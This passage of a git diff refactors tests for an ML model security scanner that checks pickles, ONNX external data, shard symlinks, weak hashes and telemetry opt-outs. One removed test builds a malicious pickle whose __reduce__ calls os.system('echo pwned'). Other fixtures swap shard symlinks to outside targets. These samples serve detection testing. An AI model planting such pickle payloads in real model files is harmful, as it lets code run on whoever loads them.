generator_closed == [True] assert not streamed_file.exists() @@ -4539,11 +4365,6 @@ def close(self) -> None: def test_scan_model_streaming_scan_error_handling(temp_test_files: list[Path]) -> None: """Test that scan errors are handled gracefully in streaming mode.""" - def file_generator(): - for i, file_path in enumerate(temp_test_files): - is_last = i == len(temp_test_files) - 1 - yield (file_path, is_last) - with patch("modelaudit.core.scan_file") as mock_scan: # First file succeeds, second fails, third succeeds mock_scan.side_effect = [ @@ -4553,7 +4374,7 @@ def file_generator(): ] result = scan_model_streaming( - file_generator=file_generator(), + file_generator=_file_generator(temp_test_files), timeout=30, delete_after_scan=False, ) @@ -4653,15 +4474,11 @@ def test_scan_model_streaming_progress_callback(temp_test_files: list[Path]) -> def progress_callback(message: str, percentage: float) -> None: progress_calls.append((message, percentage)) - def file_generator() -> Iterator[tuple[Path, bool]]: - for i, file_path in enumerate(temp_test_files): - yield (file_path, i == len(temp_test_files) - 1) - with patch("modelaudit.core.scan_file") as mock_scan: mock_scan.side_effect = [create_mock_scan_result() for _ in temp_test_files] scan_model_streaming( - file_generator=file_generator(), + file_generator=_file_generator(temp_test_files), timeout=30, progress_callback=progress_callback, delete_after_scan=False, @@ -4678,10 +4495,6 @@ def file_generator() -> Iterator[tuple[Path, bool]]: def test_scan_model_streaming_asset_creation(temp_test_files: list[Path]) -> None: """Test that assets are created during streaming scan.""" - def file_generator() -> Iterator[tuple[Path, bool]]: - for i, file_path in enumerate(temp_test_files): - yield (file_path, i == len(temp_test_files) - 1) - with ( patch("modelaudit.core.scan_file") as mock_scan, patch("modelaudit.utils.helpers.assets.asset_from_scan_result") as mock_asset, @@ -4696,7 +4509,7 @@ def file_generator() -> Iterator[tuple[Path, bool]]: } result = scan_model_streaming( - file_generator=file_generator(), + file_generator=_file_generator(temp_test_files), timeout=30, delete_after_scan=False, ) @@ -4707,3 +4520,54 @@ def file_generator() -> Iterator[tuple[Path, bool]]: assert mock_asset.call_count == 3 assert result.assets assert all(asset.is_streamed is True for asset in result.assets) + + +def _assert_symlinked_hf_onnx_cache_root( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, requires_symlinks: None, case_filename: str +) -> None: + real_hub = tmp_path / "real-hub" + link_hub = tmp_path / "link-hub" + real_hub.mkdir() + link_hub.symlink_to(real_hub, target_is_directory=True) + monkeypatch.setenv("HF_HUB_CACHE", str(link_hub)) + + cache_root = link_hub / "models--test--model" + blobs_dir = cache_root / "blobs" + snapshot_dir = cache_root / "snapshots" / ("a" * 40) / "onnx" + blobs_dir.mkdir(parents=True) + snapshot_dir.mkdir(parents=True) + + model_blob = blobs_dir / "model-blob" + sidecar_blob = blobs_dir / "sidecar-blob" + model_blob.write_bytes(create_external_onnx_payload(tmp_path)) + sidecar_blob.write_bytes(struct.pack("f", 1.0)) + (snapshot_dir / case_filename).symlink_to(os.path.relpath(model_blob, snapshot_dir)) + (snapshot_dir / "model.onnx_data").symlink_to(os.path.relpath(sidecar_blob, snapshot_dir)) + + result = scan_model_directory_or_file( + str(snapshot_dir), + cache_enabled=False, + scanners=["onnx"], + skip_file_types=False, + ) + + failed_external = [ + check + for check in result.checks + if check.name == "External Data Reference Check" and check.status.value == "failed" + ] + passed_external = [ + check + for check in result.checks + if check.name == "External Data Reference Check" + and check.status.value == "passed" + and check.details.get("file") == "model.onnx_data" + ] + symlink_traversal_checks = [ + check for check in result.checks if check.name == "CVE-2026-34447: External Data Symlink Traversal" + ] + + assert failed_external == [] + assert len(passed_external) == 1 + assert symlink_traversal_checks == [] + assert_only_onnx_external_schema_validation_skipped(result) diff --git a/tests/test_telemetry.py b/tests/test_telemetry.py index 8fdcbf390..17613daaf 100644 --- a/tests/test_telemetry.py +++ b/tests/test_telemetry.py @@ -209,77 +209,23 @@ def test_telemetry_enabled_by_default_in_production(self): def test_telemetry_disabled_in_development(self): """Test that telemetry is disabled by default in development (editable install).""" - with ( - tempfile.TemporaryDirectory() as temp_dir, - patch("modelaudit.telemetry.Path.home") as mock_home, - patch("modelaudit.telemetry._IS_DEVELOPMENT", True), # Simulate development - patch.dict( - os.environ, - { - "CI": "", - "IS_TESTING": "", - "PROMPTFOO_DISABLE_TELEMETRY": "", - "NO_ANALYTICS": "", - "MODELAUDIT_TELEMETRY_DEV": "", - }, - clear=False, - ), - ): - mock_home.return_value = Path(temp_dir) - client = TelemetryClient() - - # Telemetry should be disabled by default in development - assert client._is_disabled() is True + # Simulate development + # Telemetry should be disabled by default in development + _assert_development_telemetry_policy((""), (True)) def test_telemetry_can_be_enabled_in_development(self): """Test that telemetry can be explicitly enabled in development.""" - with ( - tempfile.TemporaryDirectory() as temp_dir, - patch("modelaudit.telemetry.Path.home") as mock_home, - patch("modelaudit.telemetry._IS_DEVELOPMENT", True), # Simulate development - patch.dict( - os.environ, - { - "CI": "", - "IS_TESTING": "", - "PROMPTFOO_DISABLE_TELEMETRY": "", - "NO_ANALYTICS": "", - "MODELAUDIT_TELEMETRY_DEV": "1", - }, - clear=False, - ), - ): - mock_home.return_value = Path(temp_dir) - client = TelemetryClient() - - # Telemetry should be enabled when explicitly opted in during development - assert client._is_disabled() is False + # Simulate development + # Telemetry should be enabled when explicitly opted in during development + _assert_development_telemetry_policy(("1"), (False)) def test_promptfoo_disable_env_var(self): """Test that PROMPTFOO_DISABLE_TELEMETRY works.""" - with ( - patch.dict(os.environ, {"PROMPTFOO_DISABLE_TELEMETRY": "1"}), - patch("modelaudit.telemetry._IS_DEVELOPMENT", False), - tempfile.TemporaryDirectory() as temp_dir, - patch("modelaudit.telemetry.Path.home") as mock_home, - ): - mock_home.return_value = Path(temp_dir) - client = TelemetryClient() - - assert client._is_disabled() is True + _assert_telemetry_disable_environment("PROMPTFOO_DISABLE_TELEMETRY") def test_ci_environment_disables_telemetry(self): """Test that CI environment disables telemetry.""" - with ( - patch.dict(os.environ, {"CI": "1"}), - patch("modelaudit.telemetry._IS_DEVELOPMENT", False), - tempfile.TemporaryDirectory() as temp_dir, - patch("modelaudit.telemetry.Path.home") as mock_home, - ): - mock_home.return_value = Path(temp_dir) - client = TelemetryClient() - - assert client._is_disabled() is True + _assert_telemetry_disable_environment("CI") def test_promptfoo_truthy_aliases_disable_telemetry(self, tmp_path: Path) -> None: """Promptfoo truthy env aliases should use the same disable path as true/1.""" @@ -1186,5 +1132,41 @@ def test_core_scan_emits_issue_found_telemetry(self) -> None: assert mock_core_record_issue_found.call_count + mock_results_record_issue_found.call_count > 0 +def _assert_development_telemetry_policy(case_dev_override: str, case_disabled: bool) -> None: + with ( + tempfile.TemporaryDirectory() as temp_dir, + patch("modelaudit.telemetry.Path.home") as mock_home, + patch("modelaudit.telemetry._IS_DEVELOPMENT", True), + patch.dict( + os.environ, + { + "CI": "", + "IS_TESTING": "", + "PROMPTFOO_DISABLE_TELEMETRY": "", + "NO_ANALYTICS": "", + "MODELAUDIT_TELEMETRY_DEV": case_dev_override, + }, + clear=False, + ), + ): + mock_home.return_value = Path(temp_dir) + client = TelemetryClient() + + assert client._is_disabled() is case_disabled + + +def _assert_telemetry_disable_environment(case_environment_key: str) -> None: + with ( + patch.dict(os.environ, {case_environment_key: "1"}), + patch("modelaudit.telemetry._IS_DEVELOPMENT", False), + tempfile.TemporaryDirectory() as temp_dir, + patch("modelaudit.telemetry.Path.home") as mock_home, + ): + mock_home.return_value = Path(temp_dir) + client = TelemetryClient() + + assert client._is_disabled() is True + + if __name__ == "__main__": pytest.main([__file__]) diff --git a/tests/test_tensorflow_lambda_detection.py b/tests/test_tensorflow_lambda_detection.py index ff21a0d78..f1cb76121 100644 --- a/tests/test_tensorflow_lambda_detection.py +++ b/tests/test_tensorflow_lambda_detection.py @@ -15,16 +15,9 @@ from modelaudit.scanners.base import IssueSeverity from modelaudit.scanners.tf_savedmodel_scanner import TensorFlowSavedModelScanner - -def has_tensorflow(): - """Check if TensorFlow is available.""" - try: - import tensorflow as tf - - # Vendored protobuf stubs expose `tensorflow.*` modules but not runtime APIs. - return bool(getattr(tf, "__version__", None)) and hasattr(tf, "constant") - except Exception: - return False +# Check if TensorFlow is available. +# Vendored protobuf stubs expose `tensorflow.*` modules but not runtime APIs. +from tests.helpers.frameworks import has_tensorflow_runtime as has_tensorflow @pytest.mark.tensorflow diff --git a/tests/test_weak_hash_detection.py b/tests/test_weak_hash_detection.py index 1e487413d..8863bd8fd 100644 --- a/tests/test_weak_hash_detection.py +++ b/tests/test_weak_hash_detection.py @@ -1,10 +1,12 @@ """Tests for weak hash algorithm detection (Requirement 28: Hash Collisions or Weak Hashes).""" import json +from pathlib import Path +from typing import cast import pytest -from modelaudit.scanners.base import CheckStatus +from modelaudit.scanners.base import CheckStatus, IssueSeverity from modelaudit.scanners.manifest_scanner import HASH_INTEGRITY_KEYS, HEX_PATTERN, ManifestScanner @@ -52,37 +54,13 @@ def scanner(self): def test_md5_hash_detected(self, scanner, tmp_path): """Test that MD5 hashes are detected as weak.""" - config_file = tmp_path / "config.json" - config_content = { - "model_type": "bert", - "checksum": "d41d8cd98f00b204e9800998ecf8427e", # MD5 (32 chars) - } - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] - assert len(weak_hash_checks) == 1 - assert weak_hash_checks[0].status == CheckStatus.FAILED - assert weak_hash_checks[0].severity.name == "WARNING" - assert weak_hash_checks[0].details["algorithm"] == "MD5" + # MD5 (32 chars) + _assert_weak_hash_algorithm(scanner, tmp_path, "checksum", "d41d8cd98f00b204e9800998ecf8427e", "MD5") def test_sha1_hash_detected(self, scanner, tmp_path): """Test that SHA1 hashes are detected as weak.""" - config_file = tmp_path / "config.json" - config_content = { - "model_type": "bert", - "file_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", # SHA1 (40 chars) - } - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] - assert len(weak_hash_checks) == 1 - assert weak_hash_checks[0].status == CheckStatus.FAILED - assert weak_hash_checks[0].severity.name == "WARNING" - assert weak_hash_checks[0].details["algorithm"] == "SHA1" + # SHA1 (40 chars) + _assert_weak_hash_algorithm(scanner, tmp_path, "file_hash", "da39a3ee5e6b4b0d3255bfef95601890afd80709", "SHA1") def test_sha256_hash_not_flagged_as_weak(self, scanner, tmp_path): """Test that SHA256 hashes are NOT flagged as weak.""" @@ -124,32 +102,12 @@ def test_sha512_hash_not_flagged_as_weak(self, scanner, tmp_path): def test_non_hash_key_not_checked(self, scanner, tmp_path): """Test that non-hash keys with 32-char values are NOT flagged.""" - config_file = tmp_path / "config.json" - config_content = { - "model_type": "bert", - # This is 32 chars but 'id' is not a hash key - "id": "d41d8cd98f00b204e9800998ecf8427e", - } - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] - assert len(weak_hash_checks) == 0 + # This is 32 chars but 'id' is not a hash key + _assert_unrecognized_hash_value(scanner, tmp_path, "id", "d41d8cd98f00b204e9800998ecf8427e") def test_non_hex_value_not_checked(self, scanner, tmp_path): """Test that non-hex values in hash keys are not flagged.""" - config_file = tmp_path / "config.json" - config_content = { - "model_type": "bert", - "checksum": "this-is-not-a-valid-hex-string!", - } - config_file.write_text(json.dumps(config_content)) - - result = scanner.scan(str(config_file)) - - weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] - assert len(weak_hash_checks) == 0 + _assert_unrecognized_hash_value(scanner, tmp_path, "checksum", "this-is-not-a-valid-hex-string!") def test_nested_hash_detection(self, scanner, tmp_path): """Test that weak hashes in nested structures are detected.""" @@ -318,3 +276,36 @@ def test_uppercase_hex_hash(self, scanner, tmp_path): ] assert len(weak_hash_checks) == 1 assert weak_hash_checks[0].details["algorithm"] == "MD5" + + +def _assert_weak_hash_algorithm( + scanner: ManifestScanner, tmp_path: Path, case_key: str, case_value: str, case_algorithm: str +) -> None: + config_file = tmp_path / "config.json" + config_content = { + "model_type": "bert", + case_key: case_value, + } + config_file.write_text(json.dumps(config_content)) + + result = scanner.scan(str(config_file)) + + weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] + assert len(weak_hash_checks) == 1 + assert weak_hash_checks[0].status == CheckStatus.FAILED + assert cast(IssueSeverity, weak_hash_checks[0].severity).name == "WARNING" + assert weak_hash_checks[0].details["algorithm"] == case_algorithm + + +def _assert_unrecognized_hash_value(scanner: ManifestScanner, tmp_path: Path, case_key: str, case_value: str) -> None: + config_file = tmp_path / "config.json" + config_content = { + "model_type": "bert", + case_key: case_value, + } + config_file.write_text(json.dumps(config_content)) + + result = scanner.scan(str(config_file)) + + weak_hash_checks = [c for c in result.checks if c.name == "Weak Hash Detection"] + assert len(weak_hash_checks) == 0 diff --git a/tests/test_why_explanations.py b/tests/test_why_explanations.py index b265c1e4b..780f5252d 100644 --- a/tests/test_why_explanations.py +++ b/tests/test_why_explanations.py @@ -15,6 +15,7 @@ ) from modelaudit.scanners.base import Issue, IssueSeverity, ScanResult from modelaudit.scanners.pickle_scanner import PickleScanner +from tests.helpers.file_creators import SystemCommandPayload def test_issue_with_why_field(): @@ -133,13 +134,8 @@ def test_pickle_scanner_includes_why(): # Create a pickle with os.system call with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as f: # Create a malicious pickle - class Evil: - def __reduce__(self): - import os - return (os.system, ("echo pwned",)) - - pickle.dump(Evil(), f) + pickle.dump(SystemCommandPayload("echo pwned"), f) f.flush() # Ensure data is written temp_path = f.name f.close() # Close before scanning (required on Windows) diff --git a/tests/utils/file/test_advanced_file_handler.py b/tests/utils/file/test_advanced_file_handler.py index b5a5db932..960c8b8e5 100644 --- a/tests/utils/file/test_advanced_file_handler.py +++ b/tests/utils/file/test_advanced_file_handler.py @@ -27,6 +27,22 @@ ) +def _assert_suspect_shard_family_not_cacheable(tmp_path: Path, field: str, value: object) -> None: + shard = tmp_path / "checkpoint_1.pt" + shard.write_bytes(b"content") + family: dict[str, object] = { + "pattern": r"checkpoint_(\d+)\.pt", + "shards": [str(shard)], + "total_shards": 1, + field: value, + } + + fingerprint, cacheable = _build_advanced_shard_family_cache_fingerprint(family, object()) + + assert fingerprint is None + assert cacheable is False + + class CompletingShardScanner: """Minimal scanner for shard-handler coverage tests.""" @@ -620,16 +636,7 @@ def test_shard_target_swap_after_detection_fails_closed( shard_two.symlink_to(inside_target) scanned_payloads: list[bytes] = [] - class RecordingScanner: - name = "recording_scanner" - - def scan(self, shard_path: str) -> ScanResult: - scanned_payloads.append(Path(shard_path).read_bytes()) - result = ScanResult(scanner_name=self.name) - result.finish(success=True) - return result - - handler = AdvancedFileHandler(str(shard_one), RecordingScanner()) + handler = AdvancedFileHandler(str(shard_one), _recording_scanner(scanned_payloads)()) shard_two.unlink() shard_two.symlink_to(outside_target) @@ -647,16 +654,7 @@ def test_shard_same_size_rewrite_after_detection_fails_before_scan(self, tmp_pat shard_two.write_bytes(b"safe") scanned_payloads: list[bytes] = [] - class RecordingScanner: - name = "recording_scanner" - - def scan(self, shard_path: str) -> ScanResult: - scanned_payloads.append(Path(shard_path).read_bytes()) - result = ScanResult(scanner_name=self.name) - result.finish(success=True) - return result - - handler = AdvancedFileHandler(str(shard_one), RecordingScanner()) + handler = AdvancedFileHandler(str(shard_one), _recording_scanner(scanned_payloads)()) original_stat = shard_two.stat() shard_two.write_bytes(b"evil") os.utime( @@ -1888,19 +1886,7 @@ def test_suspect_shard_family_counts_are_not_cacheable( value: object, ) -> None: """Any suspect or malformed family count must prevent cache reuse.""" - shard = tmp_path / "checkpoint_1.pt" - shard.write_bytes(b"content") - family: dict[str, object] = { - "pattern": r"checkpoint_(\d+)\.pt", - "shards": [str(shard)], - "total_shards": 1, - field: value, - } - - fingerprint, cacheable = _build_advanced_shard_family_cache_fingerprint(family, object()) - - assert fingerprint is None - assert cacheable is False + _assert_suspect_shard_family_not_cacheable(tmp_path, field, value) @pytest.mark.parametrize( ("field", "value"), @@ -1922,19 +1908,7 @@ def test_suspect_shard_family_members_are_not_cacheable( value: object, ) -> None: """Any suspect or malformed family member list must prevent cache reuse.""" - shard = tmp_path / "checkpoint_1.pt" - shard.write_bytes(b"content") - family: dict[str, object] = { - "pattern": r"checkpoint_(\d+)\.pt", - "shards": [str(shard)], - "total_shards": 1, - field: value, - } - - fingerprint, cacheable = _build_advanced_shard_family_cache_fingerprint(family, object()) - - assert fingerprint is None - assert cacheable is False + _assert_suspect_shard_family_not_cacheable(tmp_path, field, value) def test_duplicate_resolved_shard_family_members_are_not_cacheable( self, @@ -2376,3 +2350,16 @@ def test_sharded_model_preserves_unsuccessful_shard_result(self, tmp_path: Path) assert result.has_errors is False assert "scan_outcome" not in result.metadata assert any(check.name == "Shard Parse Coverage" for check in result.checks) + + +def _recording_scanner(scanned_payloads: list[bytes]) -> type[Any]: + class RecordingScanner: + name = "recording_scanner" + + def scan(self, shard_path: str) -> ScanResult: + scanned_payloads.append(Path(shard_path).read_bytes()) + result = ScanResult(scanner_name=self.name) + result.finish(success=True) + return result + + return RecordingScanner diff --git a/tests/utils/file/test_file_filter.py b/tests/utils/file/test_file_filter.py index 0725b81c0..78a0fd76c 100644 --- a/tests/utils/file/test_file_filter.py +++ b/tests/utils/file/test_file_filter.py @@ -32,7 +32,7 @@ should_skip_file, ) from modelaudit.utils.file.hdf5 import HDF5_MAGIC, hdf5_metadata_checksum -from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos +from tests.helpers.file_creators import corrupt_zip_member_crc as _corrupt_zip_member_crc from tests.helpers.file_creators import ( create_mock_mxnet_symbol, create_mock_onnx, @@ -41,12 +41,12 @@ prefix_mock_onnx_with_unknown_field, valid_jpeg_bytes, valid_png_bytes, + write_sparse_safetensors_framing, ) - - -def _require_tf_protos() -> None: - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") +from tests.helpers.file_creators import ( + printable_unknown_proto_prefix as _printable_unknown_proto_prefix, +) +from tests.helpers.tensorflow import _require_tf_protos, build_tf_savedmodel def _build_tf_metagraph_bytes() -> bytes: @@ -62,25 +62,11 @@ def _build_tf_metagraph_bytes() -> bytes: def _build_tf_savedmodel_bytes() -> bytes: - _require_tf_protos() - import modelaudit.protos # noqa: F401 - - saved_model_pb2 = importlib.import_module("tensorflow.core.protobuf.saved_model_pb2") - saved_model = saved_model_pb2.SavedModel() - saved_model.saved_model_schema_version = 1 - metagraph = saved_model.meta_graphs.add() - node = metagraph.graph_def.node.add() - node.name = "const_node" - node.op = "Const" - return cast(bytes, saved_model.SerializeToString()) + return build_tf_savedmodel("const_node", "Const") def _write_sparse_oversized_safetensors_candidate(path: Path) -> None: - header_len = SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + 1 - with path.open("wb") as handle: - handle.write(struct.pack(" None: @@ -100,11 +86,6 @@ def _write_hdf5_userblock_candidate(path: Path, *, valid_checksum: bool) -> None ) -def _printable_unknown_proto_prefix(min_bytes: int) -> bytes: - field = b"z " + (b"x" * 32) - return field * ((min_bytes // len(field)) + 1) - - def _build_lightgbm_text() -> str: return "\n".join( [ @@ -128,35 +109,6 @@ def _write_cntkv2(path: Path, include_structure: bool = True) -> None: path.write_bytes(prefix + structure + b" inputs outputs ") -def _corrupt_zip_member_crc(path: Path, member_name: str) -> None: - """Patch a ZIP member CRC so reading the member raises BadZipFile.""" - with zipfile.ZipFile(path) as archive: - info = archive.getinfo(member_name) - bad_crc = ((info.CRC + 1) & 0xFFFFFFFF).to_bytes(4, "little") - local_offset = info.header_offset - - data = bytearray(path.read_bytes()) - assert data[local_offset : local_offset + 4] == b"PK\x03\x04" - data[local_offset + 14 : local_offset + 18] = bad_crc - - member_name_bytes = member_name.encode("utf-8") - central_offset = 0 - while True: - central_offset = data.find(b"PK\x01\x02", central_offset) - assert central_offset >= 0 - name_length = int.from_bytes(data[central_offset + 28 : central_offset + 30], "little") - extra_length = int.from_bytes(data[central_offset + 30 : central_offset + 32], "little") - comment_length = int.from_bytes(data[central_offset + 32 : central_offset + 34], "little") - name_start = central_offset + 46 - name_end = name_start + name_length - if data[name_start:name_end] == member_name_bytes: - data[central_offset + 16 : central_offset + 20] = bad_crc - break - central_offset = name_end + extra_length + comment_length - - path.write_bytes(data) - - class TestFileFilter: """Test file filtering functionality.""" @@ -909,23 +861,11 @@ def test_docx_like_zip_remains_skipped(self, tmp_path: Path) -> None: def test_docx_with_embedded_ole_bin_remains_skipped(self, tmp_path: Path) -> None: """Office ZIPs with embedded OLE binaries should not be treated as model archives.""" - docx_path = tmp_path / "embedded.docx" - with zipfile.ZipFile(docx_path, "w") as archive: - archive.writestr("[Content_Types].xml", "") - archive.writestr("word/document.xml", "") - archive.writestr("word/embeddings/oleObject1.bin", b"embedded-ole") - - assert should_skip_file(str(docx_path)) + _assert_embedded_ole_docx_skipped(tmp_path, ("embedded.docx"), (b"embedded-ole")) def test_docx_with_embedded_pk_near_match_bin_remains_skipped(self, tmp_path: Path) -> None: """PK-prefixed non-ZIP OLE binaries must not promote Office documents.""" - docx_path = tmp_path / "embedded-pk-near-match.docx" - with zipfile.ZipFile(docx_path, "w") as archive: - archive.writestr("[Content_Types].xml", "") - archive.writestr("word/document.xml", "") - archive.writestr("word/embeddings/oleObject1.bin", b"PKNOPE embedded-ole") - - assert should_skip_file(str(docx_path)) + _assert_embedded_ole_docx_skipped(tmp_path, ("embedded-pk-near-match.docx"), (b"PKNOPE embedded-ole")) def test_docx_with_unreadable_embedded_pickle_bin_is_preserved(self, tmp_path: Path) -> None: """Unreadable model-like .bin members must preserve Office ZIPs for full scanning.""" @@ -1018,3 +958,13 @@ def raise_os_error(_path: str) -> str: monkeypatch.setattr("modelaudit.utils.file.detection.detect_file_format_for_skip_filter", raise_os_error) assert not should_skip_file(str(disguised_payload)) + + +def _assert_embedded_ole_docx_skipped(tmp_path: Path, case_filename: str, case_payload: bytes) -> None: + docx_path = tmp_path / case_filename + with zipfile.ZipFile(docx_path, "w") as archive: + archive.writestr("[Content_Types].xml", "") + archive.writestr("word/document.xml", "") + archive.writestr("word/embeddings/oleObject1.bin", case_payload) + + assert should_skip_file(str(docx_path)) diff --git a/tests/utils/file/test_filetype.py b/tests/utils/file/test_filetype.py index 3e5fb5aab..669b4247a 100644 --- a/tests/utils/file/test_filetype.py +++ b/tests/utils/file/test_filetype.py @@ -54,15 +54,45 @@ prefix_mock_onnx_with_unknown_field, prefix_mock_onnx_with_unknown_group, ) -from tests.helpers.file_creators import _coreml_field_bytes, _coreml_field_varint, create_v7_tar_archive - - -def _ubjson_key(key: bytes) -> bytes: - return b"U" + bytes([len(key)]) + key - - -def _ubjson_string(value: bytes) -> bytes: - return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value +from tests.helpers.file_creators import ( + _encode_protobuf_varint as _encode_proto_varint, +) +from tests.helpers.file_creators import ( + bert_vocab_payload as _bert_vocab_payload, +) +from tests.helpers.file_creators import ( + bpe_merges_payload as _bpe_merges_payload, +) +from tests.helpers.file_creators import ( + create_v7_tar_archive, + write_sparse_safetensors_framing, +) +from tests.helpers.file_creators import ( + printable_unknown_proto_prefix as _printable_unknown_proto_prefix, +) +from tests.helpers.file_creators import ( + protobuf_bytes_field as _coreml_field_bytes, +) +from tests.helpers.file_creators import protobuf_bytes_field as _proto_length_field +from tests.helpers.file_creators import ( + protobuf_varint_field as _coreml_field_varint, +) +from tests.helpers.file_creators import protobuf_varint_field as _proto_varint_field +from tests.helpers.file_creators import ( + ubjson_key as _ubjson_key, +) +from tests.helpers.file_creators import ( + ubjson_string as _ubjson_string, +) +from tests.helpers.file_creators import ( + write_hf_tokenizer_json as _write_hf_tokenizer_json, +) +from tests.helpers.file_creators import ( + write_ordered_hf_tokenizer_json as _write_ordered_hf_tokenizer_json, +) +from tests.helpers.file_creators import ( + write_truncated_ordered_hf_tokenizer_json as _write_truncated_ordered_hf_tokenizer_json, +) def _create_mar_archive( @@ -80,50 +110,6 @@ def _create_mar_archive( return mar_path -def _write_hf_tokenizer_json(path: Path, extra_fields: dict[str, Any] | None = None) -> Path: - payload: dict[str, Any] = { - "version": "1.0", - "added_tokens": [], - "model": { - "type": "BPE", - "vocab": {"hello": 0}, - "merges": [], - }, - } - if extra_fields: - payload.update(extra_fields) - path.write_text(json.dumps(payload), encoding="utf-8") - return path - - -def _write_ordered_hf_tokenizer_json( - path: Path, - *, - late_fields: str = "", - padding_size: int = 0, - model_fields: str = '"type":"BPE","vocab":{"hello":0},"merges":[]', - version_json: str = '"1.0"', -) -> Path: - padding = f',"padding":"{"x" * padding_size}"' if padding_size else "" - path.write_text( - (f'{{"version":{version_json},"added_tokens":[],"model":{{{model_fields}}}{padding}{late_fields}}}'), - encoding="utf-8", - ) - return path - - -def _write_truncated_ordered_hf_tokenizer_json(path: Path, *, padding_size: int) -> Path: - path.write_text( - ( - '{"version":"1.0","added_tokens":[],' - '"model":{"type":"BPE","vocab":{"hello":0},"merges":[]},' - f'"padding":"{"x" * padding_size}' - ), - encoding="utf-8", - ) - return path - - def _build_tf_metagraph_bytes() -> bytes: import modelaudit.protos # noqa: F401 @@ -208,58 +194,12 @@ def _build_tf_function_graph_bytes() -> bytes: return cast(bytes, graph.SerializeToString()) -def _encode_proto_varint(value: int) -> bytes: - out = bytearray() - while value >= 0x80: - out.append((value & 0x7F) | 0x80) - value >>= 7 - out.append(value) - return bytes(out) - - -def _proto_varint_field(field_number: int, value: int) -> bytes: - return _encode_proto_varint((field_number << 3) | 0) + _encode_proto_varint(value) - - -def _proto_length_field(field_number: int, payload: bytes) -> bytes: - return _encode_proto_varint((field_number << 3) | 2) + _encode_proto_varint(len(payload)) + payload - - def _write_sparse_oversized_safetensors_candidate( path: Path, header_len: int = SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + 1, ) -> None: """Write framing beyond the routing parse budget without allocating its header.""" - with path.open("wb") as handle: - handle.write(struct.pack(" bytes: - field = b"z " + (b"x" * 32) - return field * ((min_bytes // len(field)) + 1) - - -def _bert_vocab_payload(min_bytes: int = 16 * 1024) -> bytes: - tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"] - tokens.extend(f"[unused{index}]" for index in range(2048)) - tokens.extend(f"token_{index}" for index in range(2048)) - payload = ("\n".join(tokens) + "\n").encode("utf-8") - assert len(payload) > min_bytes - return payload - - -def _bpe_merges_payload(min_bytes: int = 3 * 1024 * 1024) -> bytes: - lines = ["#version: 0.2"] - total_bytes = len(lines[0]) + 1 - index = 0 - while total_bytes <= min_bytes: - line = f"token_{index % 8192} token_{(index * 17) % 8192}" - lines.append(line) - total_bytes += len(line) + 1 - index += 1 - return ("\n".join(lines) + "\n").encode("utf-8") + write_sparse_safetensors_framing(path, header_len) def _large_model_card_payload(min_bytes: int = 3 * 1024 * 1024) -> bytes: @@ -2286,25 +2226,13 @@ def test_hf_tokenizer_json_jax_identity_is_not_claimed(tmp_path: Path) -> None: def test_hf_tokenizer_json_jax_route_evidence_requires_identity_value(tmp_path: Path) -> None: - tokenizer_path = _write_ordered_hf_tokenizer_json( - tmp_path / "tokenizer.json", - late_fields=(',"chat_template":"{{ harmless_user }}","framework":"transformers"'), + _assert_tokenizer_route_evidence( + tmp_path, ',"chat_template":"{{ harmless_user }}","framework":"transformers"', False ) - assert is_huggingface_tokenizer_json_file(tokenizer_path) is False - assert file_detection.huggingface_tokenizer_json_has_template_route_evidence(tokenizer_path) is True - assert file_detection.huggingface_tokenizer_json_has_jax_route_evidence(tokenizer_path) is False - def test_hf_tokenizer_json_jax_route_evidence_accepts_library_identity_value(tmp_path: Path) -> None: - tokenizer_path = _write_ordered_hf_tokenizer_json( - tmp_path / "tokenizer.json", - late_fields=(',"chat_template":"{{ harmless_user }}","library":"jax"'), - ) - - assert is_huggingface_tokenizer_json_file(tokenizer_path) is False - assert file_detection.huggingface_tokenizer_json_has_template_route_evidence(tokenizer_path) is True - assert file_detection.huggingface_tokenizer_json_has_jax_route_evidence(tokenizer_path) is True + _assert_tokenizer_route_evidence(tmp_path, ',"chat_template":"{{ harmless_user }}","library":"jax"', True) def test_hf_tokenizer_json_vocab_template_token_is_claimed(tmp_path: Path) -> None: @@ -2415,14 +2343,7 @@ def test_detect_generic_json_hint_before_value_budget_resolves_later_mxnet_struc def test_detect_generic_array_heads_before_value_budget_without_mxnet_structure_remains_unclaimed( tmp_path: Path, ) -> None: - model_path = tmp_path / "config.json" - model_path.write_text( - '{"heads":["classification"],"padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - assert detect_file_format(str(model_path)) == "unknown" - assert detect_file_format_from_magic(str(model_path)) == "unknown" + _assert_generic_json_structure_unclaimed(tmp_path, ("config.json"), ('{"heads":["classification"],"padding":[')) def test_detect_oversized_malformed_renamed_mxnet_preserves_established_route( @@ -2788,14 +2709,7 @@ def test_detect_generic_json_value_budget_without_mxnet_hint_remains_unclaimed(t def test_detect_generic_scalar_heads_value_budget_remains_unclaimed(tmp_path: Path) -> None: - model_path = tmp_path / "metadata.json" - model_path.write_text( - '{"heads":"main","padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - assert detect_file_format(str(model_path)) == "unknown" - assert detect_file_format_from_magic(str(model_path)) == "unknown" + _assert_generic_json_structure_unclaimed(tmp_path, ("metadata.json"), ('{"heads":"main","padding":[')) def test_detect_mxnet_integer_decode_limit_fails_closed(tmp_path: Path) -> None: @@ -2922,29 +2836,11 @@ def test_detect_renamed_lightgbm_does_not_promote_embedded_model_text(tmp_path: def test_detect_tf_metagraph_by_strict_parse(tmp_path: Path) -> None: """Detect TensorFlow MetaGraph 